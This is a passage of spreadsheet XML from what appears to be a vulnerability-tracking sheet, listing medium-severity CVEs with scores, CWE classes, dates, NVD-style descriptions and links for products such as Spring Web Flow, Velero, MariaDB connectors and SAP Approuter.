        </is>
      </c>
      <c r="B1679" s="5" t="inlineStr">
        <is>
          <t>CVE-2017-4971</t>
        </is>
      </c>
      <c r="C1679" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1679" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1679" s="5" t="inlineStr"/>
      <c r="F1679" s="5" t="n">
        <v>0.168</v>
      </c>
      <c r="G1679" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H1679" s="5" t="inlineStr">
        <is>
          <t>broadcom:spring_web_flow</t>
        </is>
      </c>
      <c r="I1679" s="5" t="inlineStr">
        <is>
          <t>2017-06-13</t>
        </is>
      </c>
      <c r="J1679" s="5" t="inlineStr"/>
      <c r="K1679" s="5" t="inlineStr">
        <is>
          <t>CWE-1188</t>
        </is>
      </c>
      <c r="L1679" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Pivotal Spring Web Flow through 2.4.4. Applications that do not change the value of the MvcViewFactoryCreator useSpringBinding property which is disabled by default (i.e., set to 'false') can be vulnerable to malicious EL expressions in view states that process form submissions but do not have a sub-element to declare explicit data binding property mappings.</t>
        </is>
      </c>
      <c r="M1679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2017-4971</t>
        </is>
      </c>
    </row>
    <row r="1680">
      <c r="A1680" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1680" s="5" t="inlineStr">
        <is>
          <t>CVE-2017-8039</t>
        </is>
      </c>
      <c r="C1680" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1680" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1680" s="5" t="inlineStr"/>
      <c r="F1680" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1680" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H1680" s="5" t="inlineStr">
        <is>
          <t>broadcom:spring_web_flow</t>
        </is>
      </c>
      <c r="I1680" s="5" t="inlineStr">
        <is>
          <t>2017-11-27</t>
        </is>
      </c>
      <c r="J1680" s="5" t="inlineStr"/>
      <c r="K1680" s="5" t="inlineStr">
        <is>
          <t>CWE-1188</t>
        </is>
      </c>
      <c r="L1680" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Pivotal Spring Web Flow through 2.4.5. Applications that do not change the value of the MvcViewFactoryCreator useSpringBinding property which is disabled by default (i.e., set to 'false') can be vulnerable to malicious EL expressions in view states that process form submissions but do not have a sub-element to declare explicit data binding property mappings. NOTE: this issue exists because of an incomplete fix for CVE-2017-4971.</t>
        </is>
      </c>
      <c r="M1680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2017-8039</t>
        </is>
      </c>
    </row>
    <row r="1681">
      <c r="A1681" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0307</t>
        </is>
      </c>
      <c r="C1681" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1681" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1681" s="5" t="inlineStr"/>
      <c r="F1681" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1681" s="5" t="inlineStr">
        <is>
          <t>windows, palo alto</t>
        </is>
      </c>
      <c r="H1681" s="5" t="inlineStr"/>
      <c r="I1681" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1681" s="5" t="inlineStr"/>
      <c r="K1681" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L1681" s="5" t="inlineStr">
        <is>
          <t>Multiple local privilege escalation vulnerabilities in the Palo Alto Networks GlobalProtect™ app allows a local user to escalate their privileges to NT AUTHORITY\SYSTEM on Windows and root on macOS and Linux. This enables a non-administrative user to execute arbitrary commands with administrative privileges.
This GlobalProtect app on iOS, Android and ChromeOS is not impacted.</t>
        </is>
      </c>
      <c r="M1681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0307</t>
        </is>
      </c>
    </row>
    <row r="1682">
      <c r="A1682" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32637</t>
        </is>
      </c>
      <c r="C1682" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1682" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1682" s="5" t="inlineStr"/>
      <c r="F1682" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1682" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H1682" s="5" t="inlineStr"/>
      <c r="I1682" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1682" s="5" t="inlineStr"/>
      <c r="K1682" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1682" s="5" t="inlineStr">
        <is>
          <t>Velero is an open source tool for backing up, restoring, and migrating Kubernetes cluster resources and persistent volumes. Prior to 1.18.1, an attacker who compromises the backup object-storage backend can upload a malicious backup tarball containing parent-directory paths that escape the extraction directory during restore and overwrite sensitive files in the Velero pod filesystem. This issue is fixed in version 1.18.1.</t>
        </is>
      </c>
      <c r="M1682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32637</t>
        </is>
      </c>
    </row>
    <row r="1683">
      <c r="A1683" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52739</t>
        </is>
      </c>
      <c r="C1683" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1683" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1683" s="5" t="inlineStr"/>
      <c r="F1683" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1683" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1683" s="5" t="inlineStr"/>
      <c r="I1683" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1683" s="5" t="inlineStr"/>
      <c r="K1683" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L1683" s="5" t="inlineStr">
        <is>
          <t>ZEBRA is a Zcash node written entirely in Rust. Prior to 4.5.0, a malicious block producer can terminate zebrad by placing the same shielded transaction in a non-finalized parent block and its child. In zebra-state/src/service/non_finalized_state/chain.rs, Chain::push originally inserted the transaction hash into tx_loc_by_hash and asserted uniqueness before updating shielded data and running the duplicate Sprout, Sapling, or Orchard nullifier checks. The repeated transaction therefore reached the transactions must be unique within a single chain assertion before contextual validation could reject it cleanly. Zebra release builds use panic equals abort, so the reachable assertion terminates the entire process; exploitation requires either two consecutive attacker-mined blocks or an attacker-mined child immediately after an honest block includes the attacker's shielded transaction. This issue is fixed in version 4.5.0.</t>
        </is>
      </c>
      <c r="M1683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52739</t>
        </is>
      </c>
    </row>
    <row r="1684">
      <c r="A1684" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55854</t>
        </is>
      </c>
      <c r="C1684" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1684" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1684" s="5" t="inlineStr"/>
      <c r="F1684" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1684" s="5" t="inlineStr">
        <is>
          <t>node.js, mysql</t>
        </is>
      </c>
      <c r="H1684" s="5" t="inlineStr"/>
      <c r="I1684" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1684" s="5" t="inlineStr"/>
      <c r="K1684" s="5" t="inlineStr">
        <is>
          <t>CWE-319, CWE-522</t>
        </is>
      </c>
      <c r="L1684" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/Node.js is used to connect applications developed on Node.js to MariaDB and MySQL databases. Prior to 3.2.4, 3.3.3, 3.4.6, and 3.5.3, MariaDB Connector/Node.js can disclose an account password when PAM dialog authentication is negotiated over an insecure transport. In lib/cmd/handshake/auth/pam-password-auth.js and lib/cmd/handshake/authentication.js, the SendPamAuthPacketFactory behavior for the server-side plugin dialog lacked the secure-transport gate applied to mysql_clear_password. With the default sslMode=DISABLE and restrictedAuth=null settings, a hostile or on-path server can send an Authentication Switch Request for dialog over plain TCP, causing the connector to return the account password in cleartext. Properly verified TLS and a local Unix socket prevent this path, while fingerprint-only server identity validation is not sufficient. This issue is fixed in versions 3.2.4, 3.3.3, 3.4.6, and 3.5.3.</t>
        </is>
      </c>
      <c r="M1684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55854</t>
        </is>
      </c>
    </row>
    <row r="1685">
      <c r="A1685" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55856</t>
        </is>
      </c>
      <c r="C1685" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1685" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1685" s="5" t="inlineStr"/>
      <c r="F1685" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1685" s="5" t="inlineStr">
        <is>
          <t>java, mysql</t>
        </is>
      </c>
      <c r="H1685" s="5" t="inlineStr"/>
      <c r="I1685" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1685" s="5" t="inlineStr"/>
      <c r="K1685" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L1685" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/J is used to connect applications developed in Java to MariaDB and MySQL databases. Prior to 2.7.14, 3.3.5, 3.4.3, and 3.5.9, when a Java application connects with sslMode=verify-full or sslMode=verify-ca, supplies a password, and does not configure serverSslCert or trustStore, Connector/J can accept an untrusted self-signed certificate through the fallbackToSystemTrustStore=true ephemeral trust manager and record its certFingerprint for later identity binding. The OK-packet and authentication-switch paths enforce the certificate fingerprint, but the initial-handshake path does not. HandshakeResponse.encode() can therefore build and send a mysql_clear_password response before checking certFingerprint != null &amp;&amp; !isMitMProof(), sslMode, or whether the authentication plugin is resistant to a man-in-the-middle, and the initial path also bypasses restrictedAuth. An active man-in-the-middle or hostile server can present a self-signed certificate, claim to be MariaDB, select mysql_clear_password as the initial authentication plugin, and receive the full database password before the connection is rejected. This issue is fixed in versions 2.7.14, 3.3.5, 3.4.3, and 3.5.9.</t>
        </is>
      </c>
      <c r="M1685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55856</t>
        </is>
      </c>
    </row>
    <row r="1686">
      <c r="A1686" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55857</t>
        </is>
      </c>
      <c r="C1686" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1686" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1686" s="5" t="inlineStr"/>
      <c r="F1686" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1686" s="5" t="inlineStr">
        <is>
          <t>java, mysql</t>
        </is>
      </c>
      <c r="H1686" s="5" t="inlineStr"/>
      <c r="I1686" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1686" s="5" t="inlineStr"/>
      <c r="K1686" s="5" t="inlineStr">
        <is>
          <t>CWE-319, CWE-522</t>
        </is>
      </c>
      <c r="L1686" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/J is used to connect applications developed in Java to MariaDB and MySQL databases. Prior to 2.7.14, 3.3.5, 3.4.3, and 3.5.9, PAM dialog authentication can be coerced into transmitting the account password over an insecure connection. The mysql_clear_password plugin is gated behind a secure transport, but the sibling PAM handler SendPamAuthPacketFactory, named dialog by the server, does not declare that requirement and inherits the default secure-required value false; older branches implement the same affected behavior in SendPamAuthPacket. A hostile or man-in-the-middle server can send an Authentication Switch Request for dialog over plain TCP, causing the driver to return the user's password in cleartext when sslMode=DISABLE and restrictedAuth=null, which is the default configuration. Properly verified TLS and local Unix sockets are not exposed to this transport vector. This issue is fixed in versions 2.7.14, 3.3.5, 3.4.3, and 3.5.9.</t>
        </is>
      </c>
      <c r="M1686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55857</t>
        </is>
      </c>
    </row>
    <row r="1687">
      <c r="A1687" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55858</t>
        </is>
      </c>
      <c r="C1687" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1687" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1687" s="5" t="inlineStr"/>
      <c r="F1687" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1687" s="5" t="inlineStr">
        <is>
          <t>java, mysql</t>
        </is>
      </c>
      <c r="H1687" s="5" t="inlineStr"/>
      <c r="I1687" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1687" s="5" t="inlineStr"/>
      <c r="K1687" s="5" t="inlineStr">
        <is>
          <t>CWE-838</t>
        </is>
      </c>
      <c r="L1687" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/J is used to connect applications developed in Java to MariaDB and MySQL databases. Prior to 2.7.14, 3.3.5, 3.4.3, and 3.5.9, the connector encodes and decodes protocol text and performs client-side escaping under the assumption that the connection character set is UTF-8. The server can report a mid-session change to character_set_client through OK-packet session-state tracking, including a change caused by SET NAMES, a stored routine or trigger, server configuration, or a hostile server. If character_set_client changes to a non-UTF-8 value, the driver continues to read and write UTF-8 while the server interprets the same bytes under another encoding, causing silent data corruption and a client/server charset-confusion mismatch that can defeat byte-wise quoting or escaping. The fix accepts only utf8, utf8mb3, or utf8mb4 after initialization; any other value causes SQLException with SQLState 08000 and closes the connection. This issue is fixed in versions 2.7.14, 3.3.5, 3.4.3, and 3.5.9.</t>
        </is>
      </c>
      <c r="M1687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55858</t>
        </is>
      </c>
    </row>
    <row r="1688">
      <c r="A1688" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55859</t>
        </is>
      </c>
      <c r="C1688" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1688" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1688" s="5" t="inlineStr"/>
      <c r="F1688" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1688" s="5" t="inlineStr">
        <is>
          <t>java, mysql</t>
        </is>
      </c>
      <c r="H1688" s="5" t="inlineStr"/>
      <c r="I1688" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1688" s="5" t="inlineStr"/>
      <c r="K1688" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-838</t>
        </is>
      </c>
      <c r="L1688" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/R2DBC is a non-blocking MariaDB and MySQL client implemented in Java. Prior to 1.4.1, org.mariadb:r2dbc-mariadb encodes and decodes all character data under the assumption that the connection character set is UTF-8. A server can announce a mid-session change to character_set_client through the OK-packet session-state-tracking mechanism, including through SET NAMES executed by a stored routine or trigger, server configuration, or a hostile or man-in-the-middle server. If the new character set is not UTF-8, the driver continues to exchange UTF-8 while the server interprets the same bytes under a different encoding, causing silent data corruption and a client/server charset-confusion mismatch that can defeat byte-wise quoting or escaping. The fix accepts only utf8, utf8mb3, or utf8mb4 after initialization; any other value raises R2dbcNonTransientResourceException with SQLState 08000 and closes the connection. This issue is fixed in version 1.4.1.</t>
        </is>
      </c>
      <c r="M1688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55859</t>
        </is>
      </c>
    </row>
    <row r="1689">
      <c r="A1689" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55860</t>
        </is>
      </c>
      <c r="C1689" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1689" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1689" s="5" t="inlineStr"/>
      <c r="F1689" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1689" s="5" t="inlineStr">
        <is>
          <t>java, mysql</t>
        </is>
      </c>
      <c r="H1689" s="5" t="inlineStr"/>
      <c r="I1689" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1689" s="5" t="inlineStr"/>
      <c r="K1689" s="5" t="inlineStr">
        <is>
          <t>CWE-319, CWE-522</t>
        </is>
      </c>
      <c r="L1689" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/R2DBC is a non-blocking MariaDB and MySQL client implemented in Java. Prior to 1.4.1, org.mariadb:r2dbc-mariadb does not gate clear-text password authentication plugins on transport encryption because the AuthenticationPlugin interface has no capability for a plugin to require a secure connection. A hostile or man-in-the-middle MariaDB server can send an AuthSwitchRequest naming mysql_clear_password or dialog (PAM) over a plain-TCP unencrypted connection, and AuthenticationFlow permits ClearPasswordPluginFlow or PamPluginFlow to return the user's password as cleartext bytes on the wire. The disclosed credentials can subsequently be used to authenticate directly to the database server. This issue is fixed in version 1.4.1.</t>
        </is>
      </c>
      <c r="M1689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55860</t>
        </is>
      </c>
    </row>
    <row r="1690">
      <c r="A1690" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58237</t>
        </is>
      </c>
      <c r="C1690" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1690" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1690" s="5" t="inlineStr"/>
      <c r="F1690" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1690" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1690" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I1690" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1690" s="5" t="inlineStr"/>
      <c r="K1690" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1690" s="5" t="inlineStr">
        <is>
          <t>WebSocket of SAP Approuter does not perform sufficient authorization checks in certain functionality. An attacker with low privileges could exploit this to access restricted functionality. Successful exploitation could allow the attacker to read sensitive information and perform limited modifications, resulting in a high impact on confidentiality and a low impact on integrity. There is no impact on availability.</t>
        </is>
      </c>
      <c r="M1690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58237</t>
        </is>
      </c>
    </row>
    <row r="1691">
      <c r="A1691" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58238</t>
        </is>
      </c>
      <c r="C1691" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1691" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1691" s="5" t="inlineStr"/>
      <c r="F1691" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1691" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1691" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I1691" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1691" s="5" t="inlineStr"/>
      <c r="K1691" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1691" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not sufficiently handle certain requests under specific conditions. An unauthenticated attacker could send specially crafted input that causes the component to crash and restart. Successful exploitation requires specific runtime conditions to be met, making the attack complex to execute. This results in a high impact on availability. There is no impact on confidentiality and integrity.</t>
        </is>
      </c>
      <c r="M1691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58238</t>
        </is>
      </c>
    </row>
    <row r="1692">
      <c r="A1692" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66776</t>
        </is>
      </c>
      <c r="C1692" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1692" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1692" s="5" t="inlineStr"/>
      <c r="F1692" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1692" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1692" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I1692" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1692" s="5" t="inlineStr"/>
      <c r="K1692" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1692" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not consistently enforce integrity verification on certain session-related request headers under specific conditions. An attacker with low privileges could send a specially crafted request that bypasses the integrity check and loads another user's session context. Successful exploitation requires the attacker to have previously observed matching session values out-of-band, which makes the attack complex to execute. This could result in a high impact on confidentiality and a low impact on integrity. There is no impact on availability.</t>
        </is>
      </c>
      <c r="M1692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66776</t>
        </is>
      </c>
    </row>
    <row r="1693">
      <c r="A1693" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66777</t>
        </is>
      </c>
      <c r="C1693" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1693" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1693" s="5" t="inlineStr"/>
      <c r="F1693" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1693" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1693" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I1693" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1693" s="5" t="inlineStr"/>
      <c r="K1693" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1693" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not sufficiently validate certain incoming requests before forwarding them to backend destinations. Due to the complexity of the required conditions, an attacker with low privileges could send specially crafted requests to bypass authorization checks and reach protected resources beyond their assigned scope. Successful exploitation could allow the attacker to read sensitive data and perform limited modifications on protected resources, resulting in a high impact on confidentiality and a low impact on integrity. There is no impact on availability.</t>
        </is>
      </c>
      <c r="M1693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66777</t>
        </is>
      </c>
    </row>
    <row r="1694">
      <c r="A1694" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69304</t>
        </is>
      </c>
      <c r="C1694" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1694" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1694" s="5" t="inlineStr"/>
      <c r="F1694" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1694" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H1694" s="5" t="inlineStr"/>
      <c r="I1694" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1694" s="5" t="inlineStr"/>
      <c r="K1694" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L1694" s="5" t="inlineStr">
        <is>
          <t>Improper handling of highly compressed data (data amplification) in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69304</t>
        </is>
      </c>
    </row>
    <row r="1695">
      <c r="A1695" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69382</t>
        </is>
      </c>
      <c r="C1695" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1695" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1695" s="5" t="inlineStr"/>
      <c r="F1695" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1695" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1695" s="5" t="inlineStr"/>
      <c r="I1695" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1695" s="5" t="inlineStr"/>
      <c r="K1695" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L1695" s="5" t="inlineStr">
        <is>
          <t>Use of a broken or risky cryptographic algorithm in Microsoft Exchange Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69382</t>
        </is>
      </c>
    </row>
    <row r="1696">
      <c r="A1696" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70091</t>
        </is>
      </c>
      <c r="C1696" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1696" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1696" s="5" t="inlineStr"/>
      <c r="F1696" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1696" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1696" s="5" t="inlineStr"/>
      <c r="I1696" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1696" s="5" t="inlineStr"/>
      <c r="K1696" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L1696" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70091</t>
        </is>
      </c>
    </row>
    <row r="1697">
      <c r="A1697" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70599</t>
        </is>
      </c>
      <c r="C1697" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1697" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1697" s="5" t="inlineStr"/>
      <c r="F1697" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1697" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1697" s="5" t="inlineStr"/>
      <c r="I1697" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1697" s="5" t="inlineStr"/>
      <c r="K1697" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L1697" s="5" t="inlineStr">
        <is>
